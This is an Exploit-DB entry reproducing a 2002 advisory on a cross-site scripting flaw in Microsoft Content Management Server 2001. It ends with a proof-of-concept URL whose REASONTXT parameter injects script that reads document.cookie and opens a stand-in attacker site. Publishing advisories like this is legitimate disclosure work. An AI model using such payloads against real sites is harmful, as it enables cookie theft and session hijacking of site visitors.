Microsoft Content Management Server 2001 - Cross-Site Scripting

EDB-ID:

21920




Platform:

ASP

Date:

2002-10-09


source: https://www.securityfocus.com/bid/5922/info

Microsoft Content Management Server 2001 is reported to be prone to cross-site scripting attacks.

An attacker could construct a malicious link to a vulnerable host that contains arbitrary HTML and script code. If this link is visited by a web user, the attacker-supplied code will be rendered in their browser, in the security context of the vulnerable site.

http://www.example.com/NR/System/Access/ManualLogin.asp?
REASONTXT=<script>alert(document.cookie);window.open
("http://attacker.site.example.com");</SCRIPT>